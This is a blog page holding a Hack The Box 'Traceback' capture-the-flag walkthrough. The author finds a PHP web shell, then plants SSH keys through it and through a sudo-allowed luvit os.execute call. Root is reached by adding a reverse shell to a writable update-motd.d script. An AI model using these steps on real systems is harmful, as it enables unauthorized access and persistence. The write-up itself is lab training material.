<!DOCTYPE html><html lang="en" mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-175469707-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-175469707-1'); </script><title>Hackthebox - Traceback | Rhovelionz</title><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="Hackthebox - Traceback" /><meta name="author" content="Rhovelionz" /><meta property="og:locale" content="en_US" /><meta name="description" content="Any actions and or activities related to the material contained within this Website is solely your responsibility. This site contains materials that can be potentially damaging or dangerous. If you do not fully understand something on this site, then GO OUT OF HERE! Refer to the laws in your province/country before accessing, using,or in any other way utilizing these materials.These materials are for educational and research purposes only." /><meta property="og:description" content="Any actions and or activities related to the material contained within this Website is solely your responsibility. This site contains materials that can be potentially damaging or dangerous. If you do not fully understand something on this site, then GO OUT OF HERE! Refer to the laws in your province/country before accessing, using,or in any other way utilizing these materials.These materials are for educational and research purposes only." /><link rel="canonical" href="http://localhost:4000/posts/Traceback/" /><meta property="og:url" content="http://localhost:4000/posts/Traceback/" /><meta property="og:site_name" content="Rhovelionz" /><meta property="og:image" content="http://localhost:4000/assets/img/Post/Traceback.jpeg" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-08-14T22:21:00+07:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="http://localhost:4000/assets/img/Post/Traceback.jpeg" /><meta property="twitter:title" content="Hackthebox - Traceback" /><meta name="twitter:site" content="@radivanh" /><meta name="twitter:creator" content="@Rhovelionz" /><meta name="google-site-verification" content="google-site-verification=eEOXNHtwQt24Bt3B-yrX7yp4uqtc0A-hWaVNSG5mL3E" /> <script type="application/ld+json"> {"url":"http://localhost:4000/posts/Traceback/","headline":"Hackthebox - Traceback","dateModified":"2020-08-14T22:21:00+07:00","datePublished":"2020-08-14T22:21:00+07:00","image":"http://localhost:4000/assets/img/Post/Traceback.jpeg","author":{"@type":"Person","name":"Rhovelionz"},"description":"Any actions and or activities related to the material contained within this Website is solely your responsibility. This site contains materials that can be potentially damaging or dangerous. If you do not fully understand something on this site, then GO OUT OF HERE! Refer to the laws in your province/country before accessing, using,or in any other way utilizing these materials.These materials are for educational and research purposes only.","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/Traceback/"},"@context":"https://schema.org"}</script> <!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT license --><link rel="shortcut icon" href="//assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="//assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="//assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="//assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="//assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="//assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="//assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="//assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="//assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="//assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="//assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="//assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="//assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="//assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="//assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="//assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="//assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="//assets/img/favicons/manifest.json"><meta name='msapplication-config' content='//assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="//assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"> <!-- CSS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --><link rel="preload" as="style" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" /><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"> <script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" async></script> <!-- JS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --> <script src="/assets/js/post.min.js" async></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"> <!-- The Side Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="//" alt="avatar"> <img src="//assets/img/sample/jadi6.png" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="profile-text mt-3"><div class="site-title"> <a href="/">Rhovelionz</a></div><div class="site-subtitle font-italic">Publish Writeup and Pentesting Report</div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="//" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="//tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="//tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="//tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="//tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>WHOAMI</span> </a></li></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <a href="https://github.com/rhovelionz" target="_blank"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/radivanh" target="_blank"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:window.open('mailto:' + ['radivanhradivanh','gmail.com'].join('@'))" > <i class="fas fa-envelope"></i> </a></div></div><!-- The Top Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="//"> Posts </a> </span> <span>Hackthebox - Traceback</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"> <!-- Fixed kramdown code highlight rendering: https://github.com/penibelst/jekyll-compress-html/issues/101 https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901 --><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Hackthebox - Traceback</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Fri, Aug 14, 2020, 10:21 PM +0700" > Aug 14, 2020 <i class="unloaded">2020-08-14T22:21:00+07:00</i> </span> by <span class="author"> Rhovelionz </span></div></div><div class="post-content"> <img src="/assets/img/Post/Traceback.jpeg"><blockquote><p><strong>Any actions and or activities related to the material contained within this Website is solely your responsibility. This site contains materials that can be potentially damaging or dangerous. If you do not fully understand something on this site, then GO OUT OF HERE! Refer to the laws in your province/country before accessing, using,or in any other way utilizing these materials.These materials are for educational and research purposes only.</strong></p></blockquote><h2 id="summary"><strong><span style="color:#ff5555">Summary</span></strong></h2><hr /><ul><li>Searching for web shell</li><li>Reverse shell it as web admin</li><li>Read the .<strong>bash_history</strong> and found that I may run the <code class="language-plaintext highlighter-rouge">luvit</code> with privesc.lua on user</li><li>Run the <code class="language-plaintext highlighter-rouge">luvit script</code> with privesc.lua to get into another <strong>user</strong></li><li>Add my <strong>ssh</strong> public key to <code class="language-plaintext highlighter-rouge">authorized_keys</code></li><li>Execute the <strong>luvit</strong> file</li><li>Put <code class="language-plaintext highlighter-rouge">ssh</code> keys into <strong>/home/sysadmin/.ssh/authorized_keys</strong></li><li>Login as <strong>sysadmin</strong> with <strong>ssh</strong></li><li>Capture <code class="language-plaintext highlighter-rouge">user.txt</code></li><li>Found <code class="language-plaintext highlighter-rouge">update-motd.d</code> with <strong>write</strong> permissiont to all <strong>files</strong></li><li>Modify <code class="language-plaintext highlighter-rouge">/etc/update-motd.d/00-header</code> script with <code class="language-plaintext highlighter-rouge">bash</code> <strong>reverse shell</strong> in order to get <code class="language-plaintext highlighter-rouge">root</code></li><li>Capture <code class="language-plaintext highlighter-rouge">root.txt</code></li></ul><h2 id="nmap"><strong><span style="color:#ff5555">Nmap</span></strong></h2><hr /><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre><td class="rouge-code"><pre>root@lordrhovelionz:~/htb/traceback# nmap -sCV -T4 -oA nmap/output traceback.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-12 10:21 WIB
Nmap scan report for traceback.htb (10.10.10.181)
Host is up (0.12s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.45 seconds
root@lordrhovelionz:~/htb/traceback# 
</pre></table></code></div></div><h2 id="port-80"><strong><span style="color:#ff5555">Port 80</span></strong></h2><hr /><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/images/htb/traceback/port80.png" alt="" /></p><p>I ran <code class="language-plaintext highlighter-rouge">Gobuster</code> with <strong>dirbuster</strong> wordlist against it and found nothing <strong>interesting</strong>.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/images/htb/traceback/gobuster1.png" alt="" /></p><p>Check the page source, there’s actually a <strong>hint</strong>.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/images/htb/traceback/sourcewebpage1.png" alt="" /></p><p>I decided to search on google with keyword <code class="language-plaintext highlighter-rouge">web shells</code> based on the <strong>source code</strong> and stumbled on this tool called <a href="https://github.com/TheBinitGhimire/Web-Shells">Web-Shells</a></p><h2 id="create-a-wordlist"><strong><span style="color:#ff5555">Create a wordlist</span></strong></h2><hr /><p>Copy all of the <strong>php</strong> files into 1 file called <code class="language-plaintext highlighter-rouge">wordlist</code>.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/images/htb/traceback/makewordlist1.png" alt="" /></p><p>I used <strong>vim</strong> to do this task, and it looks like this.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/images/htb/traceback/wordlist1.png" alt="" /></p><p>Fuzz it…</p><h2 id="fuzzing"><strong><span style="color:#ff5555">Fuzzing</span></strong></h2><hr /><p>Run the scan with <strong>FFUF</strong>.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/images/htb/traceback/ffuf1.png" alt="" /></p><p>From the result it shows <strong>smevk.php</strong> is the file that I can access from the web page.</p><p>The <strong><em>smevk</em></strong>.php is able to execute <strong>command</strong> and see <strong>directory</strong> on the webpage itself.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/images/htb/traceback/smevkpage1.png" alt="" /></p><h2 id="get-in-as-low-user-privileges"><strong><span style="color:#ff5555">Get in as low user privileges</span></strong></h2><hr /><p>So I send my <strong>ssh</strong> keys <code class="language-plaintext highlighter-rouge">/home/webadmin/.ssh/authorized_keys</code> on the web page.</p><p>And I’m in as <code class="language-plaintext highlighter-rouge">webadmin</code>…</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/images/htb/traceback/userin.png" alt="" /></p><p>There is <code class="language-plaintext highlighter-rouge">note.txt</code> in <code class="language-plaintext highlighter-rouge">~</code></p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>webadmin@traceback:~$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
webadmin@traceback:~$
</pre></table></code></div></div><p>And found something <strong>interesting</strong> which is <code class="language-plaintext highlighter-rouge">.bash_history</code> of the <strong>user</strong>, it looks like this person just execute the <code class="language-plaintext highlighter-rouge">luvit</code> with his own script called <strong>privesc.lua</strong>.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre>webadmin@traceback:~$ cat .bash_history 
ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua 
rm privesc.lua
logout
webadmin@traceback:~$ 
</pre></table></code></div></div><p>I decided not to run <code class="language-plaintext highlighter-rouge">linpeas</code> or <code class="language-plaintext highlighter-rouge">pspy</code> because this is seems obvious that I have to escalate to <code class="language-plaintext highlighter-rouge">sysadmin</code> with <strong>luvit</strong></p><p>Execute <code class="language-plaintext highlighter-rouge">sudo -l</code> with user <strong>webadmin</strong> also shows that I can run <code class="language-plaintext highlighter-rouge">luvit</code> as <strong>sudo</strong>.</p><h2 id="escalation-to-higher-user"><strong><span style="color:#ff5555">Escalation to higher user</span></strong></h2><hr /><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/images/htb/traceback/sudol.png" alt="" /></p><p>And I realized that there is another user called <code class="language-plaintext highlighter-rouge">sysadmin</code> which has higher authority than <code class="language-plaintext highlighter-rouge">webadmin</code>.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/images/htb/traceback/2users.png" alt="" /></p><p>Checking <a href="https://gtfobins.github.io/gtfobins/lua/#shell">GTFOBINS</a>, I found there is a way to get <code class="language-plaintext highlighter-rouge">sysadmin</code>’s shell.</p><p>I decided to execute the <code class="language-plaintext highlighter-rouge">luvit</code>, it’s a <code class="language-plaintext highlighter-rouge">lua</code> programming language, and send my <strong>ssh</strong> keys to the user <code class="language-plaintext highlighter-rouge">sysadmin</code>.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>webadmin@traceback:/home$ sudo -u sysadmin /home/sysadmin/luvit
Welcome to the Luvit repl!
&gt; os.execute("echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDABGR3pWiG1Wz4cE6+XldqXF4yOrqCmbquMv5DvysjYGqUCMbdmr8Gql1gVn3mfiC1jVFWiCkq1BaweneadhLj4DhaJ/hsuSpNN29Pm11UdhrBbfnIJnl9BYb3Z42lt3dAIjPW9EhHc4d+rIrXnPQxuSVx9pV+cj3QhVBQQ9y78fbSXW/82fBLbGgGsmh5jAHE8ZUlMi6xhXMVsDJy3sYkWRPzAaX+/GxqIXGu6JgmZlqtR1QwUYTYhvwQa7Hs+Xj53ayt/YKhl9LCh9xFUwH6YqEnU12+0uEtOn/15y6xfBs4JuRRo05BvOxyLk5PfAHlt/GCk3COWXXoTfrrWEv0hDFR5sSel9xRIoAWXqAYkU2C543NSHu1HrJB3i0L960Ib1DW+WcXvuH9qNZeGpdX1vljTYbKgU1dViu3ACim5YhlQI5sWWe8NH+RqoLuUIQOBhJsXwvK3kZMBOZY8kpUipgMEYm1oyUTbX8wfx1Fj/IByXwO2BLYSlNG+ym8DZc= root@lordrhovelionz' &gt;&gt; /home/sysadmin/.ssh/author
ized_keys")
true    'exit'  0
&gt; 
</pre></table></code></div></div><h2 id="capture-usertxt"><strong><span style="color:#ff5555">Capture user.txt</span></strong></h2><hr /><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/images/htb/traceback/usertxt.png" alt="" /></p><p>I’m in as <code class="language-plaintext highlighter-rouge">sysadmin</code> now…</p><h2 id="escalating-to-root"><strong><span style="color:#ff5555">Escalating to root</span></strong></h2><hr /><p>By running <strong>ps -aux</strong>, found something <strong>interesting</strong>, the copy is made every 30 seconds from the <strong>backup</strong> to the <strong>/update-motd.d</strong> directory as <strong>root</strong></p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>$ px -aux
root       1670  0.0  0.0   4628   800 ?        Ss   21:39   0:00 /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
sysadmin   1731  0.0  0.0  14428  1104 pts/0    S+   21:39   0:00 grep motd
</pre></table></code></div></div><p>Also the <strong>/etc/update-motd.d/</strong> does have permission to <strong>write</strong>.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre>$ cd /etc/update-motd.d/
$ ls -la
total 32
drwxr-xr-x  2 root sysadmin 4096 Aug 27  2019 .
drwxr-xr-x 80 root root     4096 Mar 16 03:55 ..
-rwxrwxr-x  1 root sysadmin  981 Aug 11 21:53 00-header
-rwxrwxr-x  1 root sysadmin  982 Aug 11 21:53 10-help-text
-rwxrwxr-x  1 root sysadmin 4264 Aug 11 21:53 50-motd-news
-rwxrwxr-x  1 root sysadmin  604 Aug 11 21:53 80-esm
-rwxrwxr-x  1 root sysadmin  299 Aug 11 21:53 91-release-upgrade
$ 
</pre></table></code></div></div><h2 id="reverse-shell"><strong><span style="color:#ff5555">Reverse Shell</span></strong></h2><hr /><p>All of the files have <strong>write</strong> permission, so I choose to edit <strong>00-header</strong>.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/images/htb/traceback/defaultheader00.png" alt="" /></p><p>This is the default file from <strong>/etc/update-motd.d/</strong> which I’m going to put my <strong>reverse shell</strong> inside the file and listen with <strong>netcat</strong>.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/images/htb/traceback/editedscript.png" alt="" /></p><p>And this is the <strong>file</strong> that I put my <strong>reverse shell</strong> which will give me <strong>root</strong> to the machine.</p><p>Send <strong>nc</strong> to the <strong>sysadmin</strong> on <code class="language-plaintext highlighter-rouge">/tmp</code> directory with <strong>scp</strong>.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre><td class="rouge-code"><pre>root@lordrhovelionz:~/htb/traceback# l
total 56K
drwxr-xr-x 5 root root 4.0K Aug 12 11:18 .
drwxr-xr-x 6 root root 4.0K Aug 12 10:08 ..
drwxr-xr-x 2 root root 4.0K Aug 12 10:19 exploit
-rwxr-xr-x 1 root root  35K Aug 12 11:18 nc
drwxr-xr-x 2 root root 4.0K Aug 12 10:20 nmap
drwxr-xr-x 3 root root 4.0K Aug 12 11:07 Web-Shells
root@lordrhovelionz:~/htb/traceback# scp -i ~/.ssh/id_rsa nc sysadmin@traceback.htb:/tmp
################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################
nc
</pre></table></code></div></div><p>Quick check the <strong>NC</strong> is on <code class="language-plaintext highlighter-rouge">/tmp</code></p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
</pre><td class="rouge-code"><pre>$ ls -la
total 84
drwxrwxrwt 12 root     root      4096 Aug 11 21:47 .
drwxr-xr-x 22 root     root      4096 Aug 25  2019 ..
drwxrwxrwt  2 root     root      4096 Aug 11 21:17 .font-unix
drwxrwxrwt  2 root     root      4096 Aug 11 21:17 .ICE-unix
-rwxr-xr-x  1 sysadmin sysadmin 35520 Aug 11 21:47 nc
drwx------  3 root     root      4096 Aug 11 21:17 systemd-private-61e7854a51734d09a1af240f2815b85a-apache2.service-Ivbqkb
drwx------  3 root     root      4096 Aug 11 21:17 systemd-private-61e7854a51734d09a1af240f2815b85a-systemd-resolved.service-XUcyXs
drwx------  3 root     root      4096 Aug 11 21:17 systemd-private-61e7854a51734d09a1af240f2815b85a-systemd-timesyncd.service-Au30ij
drwxrwxrwt  2 root     root      4096 Aug 11 21:17 .Test-unix
drwxrwxrwt  2 root     root      4096 Aug 11 21:17 VMwareDnD
drwx------  2 root     root      4096 Aug 11 21:31 vmware-root_411-1816005628
drwxrwxrwt  2 root     root      4096 Aug 11 21:17 .X11-unix
drwxrwxrwt  2 root     root      4096 Aug 11 21:17 .XIM-unix
$ 
</pre></table></code></div></div><p>Also fire the listener with <strong>netcat</strong>.</p><p>Now I just need to exit from the <strong>user</strong> and login back with <strong>ssh</strong> and the script will be automatically executed because of the <strong>bash reverse shell</strong> that I put on <code class="language-plaintext highlighter-rouge">/etc/update-motd.d/00-header</code> will trigger it and give me the <strong>root</strong> shell.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/images/htb/traceback/roottxt.png" alt="" /></p><hr /><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/images/mandatory/pwned.png" alt="" /></p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='//categories/hackthebox/'>Hackthebox</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="//tags/lua/" class="post-tag no-text-decoration" >Lua</a> <a href="//tags/php/" class="post-tag no-text-decoration" >Php</a> <a href="//tags/webshell/" class="post-tag no-text-decoration" >Webshell</a> <a href="//tags/ssh/" class="post-tag no-text-decoration" >Ssh</a> <a href="//tags/update-motd.d/" class="post-tag no-text-decoration" >Update-motd.d</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="/knowledge-should-be-free">do wtf you want with it.</a></div><!-- Post sharing snippet v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Hackthebox - Traceback - Rhovelionz&url=http://localhost:4000/posts/Traceback/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Hackthebox - Traceback - Rhovelionz&u=http://localhost:4000/posts/Traceback/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Hackthebox - Traceback - Rhovelionz&url=http://localhost:4000/posts/Traceback/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <a href="https://www.linkedin.com/sharing/share-offsite/?url=http://localhost:4000/posts/Traceback/" data-toggle="tooltip" data-placement="top" title="Linkedin" target="_blank"> <i class="fa-fw fab fa-linkedin"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><!-- The Pannel on right side (Desktop views) v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-tags"><h3 data-toc-skip>Trending Tags</h3><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/ssh/">Ssh</a> <a class="post-tag" href="/tags/cracking/">Cracking</a> <a class="post-tag" href="/tags/php/">Php</a> <a class="post-tag" href="/tags/john/">John</a> <a class="post-tag" href="/tags/secretsdump/">Secretsdump</a> <a class="post-tag" href="/tags/reverse-shell/">Reverse Shell</a> <a class="post-tag" href="/tags/python/">Python</a> <a class="post-tag" href="/tags/mysql/">Mysql</a> <a class="post-tag" href="/tags/lfi/">LFI</a> <a class="post-tag" href="/tags/kerbrute/">Kerbrute</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2 mb-2">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <!-- Recommend the other 3 posts according to the tags and categories of the current post, if the number is not enough, use the other latest posts to supplement. v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>More stuffs below ↓</h3><div class="card-deck mb-4"><div 